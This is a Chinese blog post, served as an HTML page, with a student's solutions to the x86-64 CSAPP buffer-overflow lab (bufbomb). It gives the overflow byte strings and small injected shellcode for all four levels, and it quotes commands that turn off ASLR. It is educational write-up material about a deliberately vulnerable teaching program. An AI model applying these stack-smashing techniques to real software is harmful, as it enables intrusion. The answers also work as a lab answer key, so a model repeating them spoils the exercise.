






























































<!doctype html>


  <meta charset="utf-8">


<title>Dear Assembly（3） · Perfect Freeze!</title>

<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- Define a description for better SEO result -->
<meta name="description" content="（大概是 Lab 三部曲）">

<!-- Feed URL -->
<link rel="alternate" href="/feed.xml" type="application/atom+xml">

<!-- Site icons -->

  <link rel="icon" href="/favicon.ico">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">


<!-- Pinned icon for Safari -->
<link rel="mask-icon" href="/favicon.svg" color="#54C7FC">

<!-- Main CSS -->
<style>body,
html {
  background: #fff;
}

.content a,
.navigation {
  font-weight: 700;
}

.content:after {
  clear: both;
}

*,
:after,
:before {
  box-sizing: border-box;
  margin: 0;
  padding: 0;
}

html {
  font-size: 100%;
  -webkit-text-size-adjust: none;
  -ms-text-size-adjust: none;
  text-size-adjust: none;
  text-rendering: optimizelegibility;
  image-rendering: optimizequality;
}

body {
  font-family: -apple-system,BlinkMacSystemFont,'Helvetica Neue','Hiragino Sans GB',Arial,sans-serif;
  font-size: 1.6vw;
  line-height: 1.42857143;
  margin: 0 auto;
  padding: 0 22vw;
  transition: all .2s ease;
  color: #000;
  font-feature-settings: 'case','ss01','ss02';
}

@media (max-width:1080px) {
  body {
    font-size: 2.24vw;
    padding-right: 8vw;
    padding-left: 8vw;
  }
}

@media (max-width:640px) {
  body {
    font-size: 3.84vw;
    padding-right: 4vw;
    padding-left: 4vw;
  }
}

@media (max-width:400px) {
  body {
    font-size: 5.12vw;
  }
}

a {
  transition: color .5s ease,border-color .5s ease,background .5s ease,opacity 1.5s ease;
  text-decoration: none;
  color: #000;
}

a:focus,
a:hover {
  transition: color .1s ease,border-color .1s ease,background .1s ease,opacity .1s ease;
  text-decoration: underline;
  -webkit-text-decoration-skip: ink;
  text-decoration-skip: ink;
}

hr {
  border: 0;
}

del {
  text-decoration: line-through;
}

::-moz-selection {
  background: rgba(108,181,252,.1);
}

::selection {
  background: rgba(108,181,252,.1);
}

::-moz-placeholder {
  opacity: .2;
  color: #000;
}

:-ms-input-placeholder {
  opacity: .2;
  color: #000;
}

::placeholder {
  opacity: .2;
  color: #000;
}

:focus::-moz-placeholder {
  color: #6cb5fc;
}

:focus:-ms-input-placeholder {
  color: #6cb5fc;
}

:focus::placeholder {
  color: #6cb5fc;
}

.navigation {
  font-size: 60%;
  margin-right: -1.1em;
  margin-left: -1.1em;
  padding-top: 1.4vmax;
  padding-bottom: 1.4vmax;
  letter-spacing: .45em;
  text-transform: uppercase;
}

.navigation li {
  line-height: 2;
  display: inline-block;
  list-style: none;
}

.navigation li a {
  padding: .5em 1.2em;
}

.navigation li a:focus,
.navigation li a:hover {
  text-decoration: none;
  color: #6cb5fc;
}

.content {
  margin-bottom: 16vmin;
}

.content:after,
.content:before {
  display: table;
  content: '';
}

.content .post-content>:first-child,
.content .post-content>:first-child>:first-child {
  margin-top: 0;
}

.content p {
  line-height: 1.71428571;
  margin-bottom: 1.6rem;
}

.content header {
  display: -ms-flexbox;
  display: flex;
  flex-direction: column;
  min-height: calc(100vh - 5.6vmax - 5ex);
  margin-right: -22vw;
  margin-bottom: 16vmin;
  margin-left: -22vw;
  background: rgba(0,0,0,.02);
  -ms-flex-direction: column;
  -ms-flex-pack: center;
  justify-content: center;
  padding: 10vmin 22vw;
}

@media (max-width:1080px) {
  .content header {
    min-height: calc(64vh - 1.4vmax * 2 - 3ex);
    margin-right: -8vw;
    margin-left: -8vw;
    padding: 16vmin 8vw;
  }
}

@media (max-width:640px) {
  .content header {
    margin-right: -4vw;
    margin-left: -4vw;
    padding-right: 4vw;
    padding-left: 4vw;
  }
}

.content header h1 {
  font-size: 360%;
  font-weight: 700;
  line-height: 1.1;
  margin-left: -2px;
  letter-spacing: -.04em;
  -webkit-hyphens: none;
  hyphens: none;
  -webkit-font-smoothing: antialiased;
  -ms-hyphens: none;
}

.content header small {
  display: block;
  margin-top: 2vmin;
}

.content h3,
.content h4 {
  font-weight: 400;
  margin: 10vmin 0 1rem;
}

.content ol,
.content ul {
  margin-bottom: 1.8rem;
  list-style: none;
  counter-reset: list;
}

@media (max-width:640px) {
  .content header h1 {
    font-size: 280%;
  }

  .content ol,
  .content ul {
    margin-left: 1em;
  }
}

.content ol li,
.content ul li {
  line-height: 1.71428571;
}

.content ol li:before,
.content ul li:before {
  font-size: 80%;
  line-height: 2.14285714;
  position: absolute;
  display: inline-block;
  width: 4em;
  margin-left: -4em;
  text-align: right;
  opacity: .6;
}

.content ul li:before {
  padding-right: .6em;
  content: '•';
}

.content ol li:before {
  padding-right: .3em;
  content: counter(list) '.';
  counter-increment: list;
}

.content hr::before {
  content: '';
  display: block;
}

.content hr::before {
  width: 3px;
  height: 3px;
  margin: 2em auto;
  border-radius: 50%;
  background: #000;
  box-shadow: 24px 0 0 0 #000,-24px 0 0 0 #000;
}

.content code {
  font-family: Menlo,Consolas,monospace;
  color: #54c7fc;
}

.content li code,
.content p code {
  word-break: break-all;
}

.leading-indent-fix {
  text-indent: -.39em;
}

.leading-indent-fix--fullwidth-parenthesis {
  text-indent: -.62em;
}

@media print {
  .content .post-content {
    max-width: 100%!important;
  }

  *,
  :after,
  :before {
    color: #000!important;
    background: 0 0!important;
    box-shadow: none!important;
    text-shadow: none!important;
  }

  body {
    margin: 0!important;
    padding: 10mm!important;
  }

  a,
  a:visited {
    text-decoration: none;
  }

  .content header {
    min-height: 0;
    padding-bottom: 0;
  }

  .content .post-content a[href]:after {
    font-weight: 400;
    content: ' (' attr(href) ')';
  }

  h3,
  h4,
  p {
    orphans: 3;
    widows: 3;
  }

  h3 {
    page-break-after: avoid;
  }

  .navigation {
    display: none;
  }
}

.content h3 {
  font-size: 96%;
  opacity: .7;
}

.content h4 {
  font-size: 84%;
  opacity: .6;
}

.navigation {
  text-align: center;
}

/*
    TODO: You have to speicify background color for `html` in order to make `-webkit-filter` work
    Link: https://bugs.chromium.org/p/chromium/issues/detail?id=591015
    Date: Mar 1, 2016, 5:41 PM
  */





/*
    TODO: Need a better solution. I have to redefine the whole box-shadow here because no invidual box-shadow-color exists
    Date: Mar 12, 2016, 12:09 AM
  */
</style>

<!-- Canonical links, avoid duplicate content problems -->
<link rel="canonical" href="http://blog.cee.moe/dear-assembly-3.html">

<!-- DNS prefetching for static files -->


<!-- browser-sync, don't remove this -->
<!-- BS_INSERT -->

<!-- Head hooks -->


<!-- Open Graph and Twitter Cards support, more info: https://dev.twitter.com/docs/cards -->


<meta property="og:type" content="article">
<meta property="og:site_name" content="Perfect Freeze!">
<meta property="og:title" content="Dear Assembly（3）">
<meta property="og:url" content="http://blog.cee.moe/dear-assembly-3.html">
<meta property="og:description" content="（大概是 Lab 三部曲）">

<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Dear Assembly（3）">
<meta name="twitter:url" content="http://blog.cee.moe/dear-assembly-3.html">
<meta name="twitter:description" content="（大概是 Lab 三部曲）">


  <meta property="article:published_time" content="2014-08-01T00:00:00+08:00">
  <meta property="article:modified_time" content="2016-08-18T11:53:25+08:00">

  <meta name="twitter:label1" value="Words">
  <meta name="twitter:data1" value="918 words">
  <meta name="twitter:label2" value="Reading time">
  <meta name="twitter:data2" value="4 mins">



  <meta name="twitter:site" content="@Ceecirno">



  <meta name="twitter:creator" content="@Ceecirno">




<!-- Post / page specified styles -->


<!-- Post specified styles -->


<!-- Main navigation with current page / categoriy highlighted -->
<nav class="navigation">
  <ul>
    
      
      <li>
        <a href="/">
          
            Home
          
        </a>
      </li>
    
      
      <li>
        <a href="/articles/">
          
            Articles
          
        </a>
      </li>
    
      
      <li>
        <a href="/works/">
          
            Works
          
        </a>
      </li>
    
      
      <li>
        <a href="/friends/">
          
            Friends
          
        </a>
      </li>
    
      
      <li>
        <a href="/about/">
          
            About
          
        </a>
      </li>
    
  </ul>
</nav>

<!-- Main content wrap -->
<main class="content " role="main">
  






























































<!-- Post-wide custom CSS -->

  


<!-- Prepare for image headers -->


<!-- Prepare for SVG header -->










<!-- Article wrapper, limit width -->
<article>

  <!-- Post title -->
  <header>

    <h1 class="
  
" title="Dear Assembly（3）" data-title="Dear Assembly（3）">
      
  
    
  
    Dear Assembly（3）<span class="dot dot--post"> </span>
  

  

    </h1>

    
      <small>
        By <span rel="author">Cee</span>
        on <time datetime="2014-08-01T00:00:00+08:00">Aug 1, 2014</time>
      </small>
    

    

    <small class="reading-time" title="Estimated read time" style="color: gray;">
      
      
        26 mins read
      
    </small>

  </header>

  <!-- Post content -->
  <div class="post-content">
    <p class="leading-indent-fix leading-indent-fix--fullwidth-parenthesis"><del>（大概是 Lab 三部曲）</del></p>

<hr>

<h3 id="intro">Intro</h3>

<p>引言的话我想推荐大家先去看 Ricter 菊苣的一篇文章：<a href="http://www.ricter.me/articles/159">缓冲区溢出的 Hello World</a>。</p>

<p>这篇文章的话讲的是 32 位的软娘插屁系统下的缓存区溢出，所以你看到的寄存器还是 <code class="highlighter-rouge">eax</code>、<code class="highlighter-rouge">ebx</code>等等。</p>

<p>今天给大家介绍的话还是主要是通过 64 位系统下的操作。毕竟寄存器数量翻了一番，位数也翻了一番，效率也更高了。最最最不同的就是汇编的代码也就是实现方式不同了。这里的话先讲一点基础知识(｢･ω･)｢。</p>

<h4 id="guan-yu-ji-cun-qi-">关于寄存器</h4>

<ol>
  <li>
    <p>之前提到过，每个寄存器也是从 32 位升级到了 64 位。对于 64 位的寄存器 <code class="highlighter-rouge">%rax</code>，它的后 32 位就相当于原来的 <code class="highlighter-rouge">%eax</code>。</p>
  </li>
  <li>
    <p>新增了 8 个用于存放参数和临时变量的寄存器 <code class="highlighter-rouge">%r8</code> ~ <code class="highlighter-rouge">r15</code>。它们的后 32 位可用作 <code class="highlighter-rouge">%r8d</code> ~ <code class="highlighter-rouge">%r15d</code>。</p>
  </li>
  <li>
    <p>所有的寄存器可以按照 8/16/32/64 位读取和写入数据。</p>
  </li>
  <li>
    <p>增加了寄存器，减少了 <code class="highlighter-rouge">push</code>（压栈）和 <code class="highlighter-rouge">pop</code>（出栈）的次数。说明一下不同寄存器的作用：</p>
  </li>
</ol>

<ul>
  <li>
    <p><code class="highlighter-rouge">%rax</code>：保存返回值。</p>
  </li>
  <li>
    <p><code class="highlighter-rouge">%rdi</code>/<code class="highlighter-rouge">%rsi</code>/<code class="highlighter-rouge">%rdx</code>/<code class="highlighter-rouge">%rcx</code>/<code class="highlighter-rouge">%r8</code>/<code class="highlighter-rouge">%r9</code>：保存参数，最多可以保存 6 个参数，大于 6 个采取同 32 位的做法压栈。</p>
  </li>
  <li>
    <p><code class="highlighter-rouge">%r10</code>/<code class="highlighter-rouge">%r11</code>：调用函数（Caller）保存调用前环境参数。</p>
  </li>
  <li>
    <p><code class="highlighter-rouge">%rsp</code>：栈顶指针。</p>
  </li>
  <li>
    <p><code class="highlighter-rouge">%rbp</code>：基址指针。</p>
  </li>
  <li>
    <p><code class="highlighter-rouge">%rbx</code>：基地址。</p>
  </li>
  <li>
    <p><code class="highlighter-rouge">%r12</code> ~ <code class="highlighter-rouge">%r15</code>：被调用函数（Callee）的临时变量。</p>
  </li>
</ul>

<h4 id="guan-yu-nei-cun-">关于内存</h4>

<ol>
  <li>分为运行时栈（Stack），堆（Heap），数据（Data）和指令（Text）四部分：</li>
</ol>

<ul>
  <li>
    <p>栈（Stack）：8MB的限制大小（IA32）。</p>
  </li>
  <li>
    <p>堆（Heap）：动态分配，使用<code class="highlighter-rouge">malloc</code>/<code class="highlighter-rouge">calloc</code>/<code class="highlighter-rouge">new</code>函数。</p>
  </li>
  <li>
    <p>数据（Data）：静态分配，部分只读，部分可读写。</p>
  </li>
  <li>
    <p>指令（Text）：运行时机器指令，只读。</p>
  </li>
</ul>

<ol>
  <li>四部分在内存中的位置由高到低。</li>
</ol>

<h3 id="level-0">Level 0</h3>

<p>最简单的 level 了。这个 level 前一定要把调用函数的机制搞懂。</p>

<p>Level 0 是希望在调用 <code class="highlighter-rouge">test()</code> 函数的时候利用内部的 <code class="highlighter-rouge">getbuf()</code> 使程序跳转到 <code class="highlighter-rouge">smoke()</code> 中继续执行。先来看看 <code class="highlighter-rouge">getbuf()</code> 函数的全貌：</p>

<script src="https://gist.github.com/cee/822ecb72b74a73eaf067.js"></script>

<p>buffer 的长度是 36 个 char，加上压栈时的 <code class="highlighter-rouge">%rbx</code> 和 <code class="highlighter-rouge">%rbp</code>，前面一共占用 36 + 16 = 52 个 byte，最后是 8 位的 return address。所以答案就是：</p>

<blockquote>
  <p>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 （36 char）<br>
00 00 00 00 00 00 00 00 （%rbx）<br>
00 00 00 00 00 00 00 00 （%rbp）<br>
00 00 00 00 c0 10 40 00 （Return address，call smoke）<br>
（注意小端表示）</p>
</blockquote>

<h3 id="level-1">Level 1</h3>

<p>和 Level 0 的区别仅仅在于传递参数的时候有个 <code class="highlighter-rouge">val</code> 要替换成自己的 cookie。看一下调用的代码 <code class="highlighter-rouge">fizz()</code>：</p>

<script src="https://gist.github.com/cee/e5d4d5c91d87d91a058f.js"></script>

<p>参数共 7 个，而且 <code class="highlighter-rouge">val</code> 正好是第 7 个。预备知识里面也提到了，对于一个函数最多可以在寄存器中存放 6 个参数，也就是说 <code class="highlighter-rouge">val</code> 此时是压栈存放的。类似于 Level 0，我们也就知道了 cookie 应该保存在哪里了：</p>

<blockquote>
  <p>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 （36 char）<br>
00 00 00 00 00 00 00 00 （%rbx）<br>
00 00 00 00 00 00 00 00 （%rbp）<br>
00 00 00 00 70 10 40 00 （Return address，call fizz）<br>
00 00 00 00 （Alignment）<br>
00 00 00 00 00 00 00 00 0b 43 71 79 17 a7 27 37 （unsigned long long）</p>
</blockquote>

<p>这里 Alignment 的作用是为了让 unsigned long long 确保地址是 16 字节对齐。</p>

<h3 id="level-2">Level 2</h3>

<p>从这关开始越来越有难度了，Level 2 是第二天睡醒起来的下午时间做的。<code class="highlighter-rouge">bang()</code> 这个函数和上面的 <code class="highlighter-rouge">fizz()</code> 很像，只不过参数变成了全局变量 <code class="highlighter-rouge">global_value</code>：</p>

<script src="https://gist.github.com/cee/f9f9679be576e6e64322.js"></script>

<p>Hints 里面也提到了一些 tricks：</p>

<blockquote>
  <p>Do not attempt to use either a <code class="highlighter-rouge">jmp</code> or a <code class="highlighter-rouge">call</code> instruction to jump to the code for <code class="highlighter-rouge">bang()</code>. These instructions use PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the <code class="highlighter-rouge">retq</code> instruction.</p>
</blockquote>

<p>不能通过 <code class="highlighter-rouge">jmp</code> 和 <code class="highlighter-rouge">call</code> 指令跳转，因为是和 Counter 相对寻址的。我们需要找到 <code class="highlighter-rouge">bang()</code> 的入口地址并且把 <code class="highlighter-rouge">cookie</code> 复制一份到 <code class="highlighter-rouge">global_value</code> 中。继续来看 <code class="highlighter-rouge">bang()</code> 函数的汇编函数：</p>

<script src="https://gist.github.com/cee/f96b2e2fd0ba6768be62.js"></script>

<p>找到我们需要的函数入口 <code class="highlighter-rouge">0x401020</code>，<code class="highlighter-rouge">cookie</code> 的地址 <code class="highlighter-rouge">0x602320</code>，<code class="highlighter-rouge">global_value</code> 的地址 <code class="highlighter-rouge">0x602308</code>。这时我们需要写一段汇编来实现函数的跳转：</p>

<blockquote>
  <p>movabs 0x602320, %rax   ;自己用的直接是立即数<br>
movabs %rax, 0x602308<br>
pushq $0x401020<br>
retq</p>
</blockquote>

<p>生成对应的 <code class="highlighter-rouge">.d</code> 文件：</p>

<blockquote>
  <p>gcc -c bang.s<br>
objdump -d bang.o &gt; bang.d</p>
</blockquote>

<p>写出最后的答案：</p>

<blockquote>
  <p>48 b8 0b 43 71 79 17 a7 27 37 48 a3 08 23 60 00 00 00 00 00 68 20 10 40 00 c3 （attack code, 26 bytes）<br>
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 （26 bytes）<br>
00 00 a0 be ff ff ff 7f （%rax，where we read buffer）</p>
</blockquote>

<h3 id="level-3">Level 3</h3>

<p>最后一关，啊哈，Instruction 上又<del>很邪恶地</del>（This style of attack is tricky）写出了要求：要更改 <code class="highlighter-rouge">%rbp</code> 和返回地址来实现攻击。最终是需要我们在 <code class="highlighter-rouge">getbuf()</code> 函数中返回我们的 <code class="highlighter-rouge">cookie</code> 来调用 <code class="highlighter-rouge">test()</code>：</p>

<script src="https://gist.github.com/cee/f4cc0270a4c57aa036b3.js"></script>

<p>思想其实和上一题类似，也是要写一段 attack code：</p>

<blockquote>
  <p>movabs $0x3727a7177971430b, %rax	;复制cookie<br>
movabs $0x7fffffffbf00, %rbp	;更改%rbp<br>
pushq  $0x400ef3	;getbuf调用后的第一条指令，接着继续执行<br>
retq</p>
</blockquote>

<p>生成后写出答案：</p>

<blockquote>
  <p>48 b8 0b 43 71 79 17 a7 27 37 48 bd 00 bf ff ff ff 7f 00 00 68 f3 0e 40 00 c3 （attack code, 26 bytes）<br>
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00（26 bytes）<br>
00 00 a0 be ff ff ff 7f （%rax，where we start comparing）<br>
<strong>撒花完工，55分到手~</strong></p>
</blockquote>

<h3 id="why-within-gdb">Why Within Gdb</h3>

<p>Instruction 在 Level 2 里面提到了这么一段话：</p>

<blockquote>
  <p>For level 2, you will need to run your exploit within gdb for it to succeed. (the VM has special memory protection that prevents execution of memory locations in the stack. Since gdb works a little differently, it will allow the exploit to succeed.)</p>
</blockquote>

<p>Level 3 也同样有类似的话：</p>

<blockquote>
  <p>For level 3, you will need to run your exploit within gdb for it to succeed.</p>
</blockquote>

<p>这是为什么呢？自己一开始表示很困惑，于是在 Forum 上提出了<a href="https://class.coursera.org/hwswinterface-002/forum/thread?thread_id=863">这个问题</a>，很快就有个好心的同学回答了。</p>

<p>我们知道对于大多数 GNU/Linux 的发行版都有内存保护机制。其中有一种用来保护内存不被攻击的方法叫做 <strong>Address Space Layout Randomization（ASLR，位址空间配置随机加载）</strong>。位址空间配置随机加载利用随机方式配置资料位址，让某些敏感资料（例如操作系统内核）能配置到一个恶意程式未能事先得知的位址，令攻击者难于进行攻击。在系统中，ASLR 是默认开启的，而 gdb 则默认禁用了 ASLR。所以我们编译后的 <code class="highlighter-rouge">bufbomb</code> 中的地址是可以被确认的，这也就解释了为什么在 gdb 中可以改写全局变量。</p>

<p>如果想要在系统下执行，可以通过 <code class="highlighter-rouge">sysctl kernel.randomize_va_space = 0</code> 或者 <code class="highlighter-rouge">echo 0 &gt; /proc/sys/kernel/randomize_va_space</code> 来解除 ASLR，但是这里<strong>肯定不推荐</strong>这么做/w\。</p>

<h3 id="references">References</h3>

<ul>
  <li>
    <p>两篇在 32 位 Linux 下的解释也相当精彩：</p>

    <ul>
      <li>
        <p><a href="http://blog.csdn.net/u013648407/article/details/25742553">CSApp Buffer Lab</a></p>
      </li>
      <li>
        <p><a href="http://blog.youlingman.info/csapp-bufbomb-lab-solve/">CSApp Bufbomb Lab解题记录</a></p>
      </li>
    </ul>
  </li>
  <li>
    <p>当然还有 Ricter 菊苣的：</p>

    <ul>
      <li><a href="http://www.ricter.me/articles/159">缓冲区溢出的 Hello World</a></li>
    </ul>
  </li>
  <li>
    <p>什么是 ASLR：</p>

    <ul>
      <li>
        <p><a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">Wikipedia</a></p>
      </li>
      <li>
        <p>课本《深入理解计算机系统（原作第二版）》P180</p>
      </li>
    </ul>
  </li>
  <li>
    <p>GNU/Linux 下的缓存区溢出：</p>

    <ul>
      <li>
        <p><a href="http://drops.wooyun.org/papers/1421">做个试验：简单的缓冲区溢出</a></p>
      </li>
      <li>
        <p><a href="http://www.exploit-db.com/papers/24085/">Stack Smashing On A Modern Linux System</a></p>
      </li>
    </ul>
  </li>
</ul>

<hr>

<p>感谢观众姥爷们翻完了这篇毫无技术的文章。两次实验给自己带来了很多知识上的长进，甚至是做出来后的惊喜，也再一次深入了解了 C/C++ 的函数调用和 x86-64 下的汇编，算是对课堂知识的一次扩充。</p>

<p>如果有机会的话之后的 lab 作业也会写点总结的文章。恩就这样~</p>



    
    

    
      <footer class="post-modified-date">
        <p>
          Updated
          <time datetime=" 2016-08-18T11:53:25+08:00 ">
            Thursday, Aug 18, 2016
          </time>
        </p>
      </footer>
    
  </div>

</article>


</main>

<!-- Footer section -->

  <footer class="footer">
    <ul>
      <li><a href="/">Perfect Freeze!</a></li>
      <li><a href="https://github.com/Cee" title="GitHub">GitHub</a></li>
      <li><a href="https://github.com/PerfectFreeze" title="Perfect Freeze - Lab">Lab</a></li>
      <li><a href="/feed.xml" title="Feed - Atom (The Atom Syndication Format)">Atom</a></li>
    </ul>
    
      <div id="disqus_thread"> </div>
      <script type="text/javascript">
          /* * * CONFIGURATION VARIABLES * * */
          var disqus_shortname = 'perfectfreeze';
          var disqus_identifier = "/dear-assembly-3.html";
          /* * * DON'T EDIT BELOW THIS LINE * * */
          (function() {
              var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
              dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
              (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
          })();
      </script>
      <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
    
  </footer>


<!-- The following code is an example use of including external JavaScript libraries -->


<!-- Theme scripts -->
<script></script>

<!-- User custom scripts -->
<script></script>

<!-- Google Analytics tracking code -->

  
    <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

      ga('create', 'UA-48656879-8', 'auto');
      ga('send', 'pageview');
    </script>
  


<!-- Foot hooks -->



